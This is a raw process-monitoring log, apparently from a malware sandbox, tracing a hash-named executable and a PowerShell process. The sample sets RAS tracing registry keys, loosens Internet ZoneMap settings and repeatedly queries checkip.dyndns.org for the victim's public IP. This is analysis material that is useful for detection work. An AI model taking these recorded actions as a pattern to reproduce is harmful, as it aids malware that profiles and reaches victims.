type:0x00000004 datalen:4 data:'00 00 10 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, 
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\FileDirectory, type:0x00000002 datalen:34 data:'25 77 69 6E 64 69 72 25 5C 74 72 61 63 69 6E 67 ' , 0x00000000 [操作成功完成。 ], 09:33:16:991, powershell.exe, 5080:7324, 2928, FILE_remove, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1, , 0x00000000 [操作成功完成。 ], 09:33:16:991, powershell.exe, 5080:7324, 2928, FILE_remove, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1, , 0x00000000 [操作成功完成。 ], 09:33:16:991, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_mkkey, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS, access:0x0002001B , 0x00000000 [操作成功完成。 ], 09:33:16:991, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\EnableFileTracing, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\EnableAutoFileTracing, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\EnableConsoleTracing, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\FileTracingMask, type:0x00000004 datalen:4 data:'00 00 FF FF ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, 
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\ConsoleTracingMask, type:0x00000004 datalen:4 data:'00 00 FF FF ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\MaxFileSize, type:0x00000004 datalen:4 data:'00 00 10 00 ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\FileDirectory, type:0x00000002 datalen:34 data:'25 00 77 00 69 00 6E 00 64 00 69 00 72 00 25 00 ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, powershell.exe, 5080:1928, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, powershell.exe, 5080:1928, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:17:022, powershell.exe, 5080:1928, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:17:022, powershell.exe, 5080:1928, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:17:039, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data, filter:'*' , 0x00000000 
[操作成功完成。 ], 09:33:17:039, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:039, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll, base:0x00000000684C0000 size:0x00357000 , 0x00000000 [操作成功完成。 ], 09:33:17:116, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:116, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll, base:0x0000000073EC0000 size:0x00106000 , 0x00000000 [操作成功完成。 ], 09:33:17:148, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:148, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:148, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:163, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, NET_connect, 193.122.130.0:80, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ], 09:33:17:242, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:242, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:257, powershell.exe, 5080:1928, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:272, powershell.exe, 
5080:1928, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:272, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll, base:0x0000000068470000 size:0x0004C000 , 0x00000000 [操作成功完成。 ], 09:33:17:897, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:897, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:931, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\PackageManagement, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:931, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\Pester, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:931, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\PowerShellGet, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:931, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\PSReadline, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:931, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:931, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:944, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:944, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\Pester, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:944, 
powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:944, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:976, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:976, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:991, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppBackgroundTask, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:991, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppLocker, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:194, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, 
FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_touch, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1, access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1, offset:0x00000000 datalen:0x0000004D , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:0, 2928, FILE_modified, 
C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1, , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_touch, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1, access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1, offset:0x00000000 datalen:0x0000004D , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1, , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, FILE_remove, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1, , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, FILE_remove, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1, , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, 
HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:304, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll, base:0x00000000683C0000 size:0x000A4000 , 0x00000000 [操作成功完成。 ], 09:33:18:336, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Appx, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:336, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:351, powershell.exe, 5080:1160, 2928, FILE_readdir, 
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:366, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:366, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:366, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\PackageManagement, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:366, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\Pester, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:366, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\PowerShellGet, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\PSReadline, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\Pester, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules, filter:'*' , 0x00000000 [操作成功完成。 
], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:398, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:413, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:429, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:429, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:522, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_http, checkip.dyndns.org/, protocol:(TCP)0 cmd:'GET' , 0x00000000 [操作成功完成。 ], 09:33:18:522, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_send, 193.122.130.0:80, protocol:(TCP)0 datalen:151 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:585, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, 
NET_connect, 193.122.130.0:80, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ], 09:33:18:632, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_http, checkip.dyndns.org/, protocol:(TCP)0 cmd:'GET' , 0x00000000 [操作成功完成。 ], 09:33:18:632, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_send, 193.122.130.0:80, protocol:(TCP)0 datalen:151 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:650, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:650, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BranchCache, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:664, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\CimCmdlets, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:664, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\ConfigCI, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:664, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:664, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:680, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:680, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:788, powershell.exe, 5080:1160, 2928, FILE_readdir, 
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.xml.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:788, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.xml.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:788, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.xml.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:866, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, PROC_exec, C:\Windows\SysWOW64\WerFault.exe, target_pid:8148 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 8816 -s 1508' , 0x00000000 [操作成功完成。 ], 09:33:18:866, WerFault.exe, 8148:0, 2928, EXEC_create, C:\Windows\SysWOW64\WerFault.exe, parent_pid:8816 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 8816 -s 1508' image_base:0x0000000000EF0000 image_size:0x0006F000 , 0x00000000 [操作成功完成。 ], 09:33:18:913, WerFault.exe, 8148:8152, 2928, REG_rmval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\AmiOverridePath, keyname:'HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags' , 0x00000000 [操作成功完成。 ], 09:33:19:100, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp, access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:19:100, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp, , 0x00000000 [操作成功完成。 ], 09:33:19:100, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp, access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:19:100, WerFault.exe, 8148:8152, 2928, FILE_truncate, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp, eof:0x00000000 , 0x00000000 
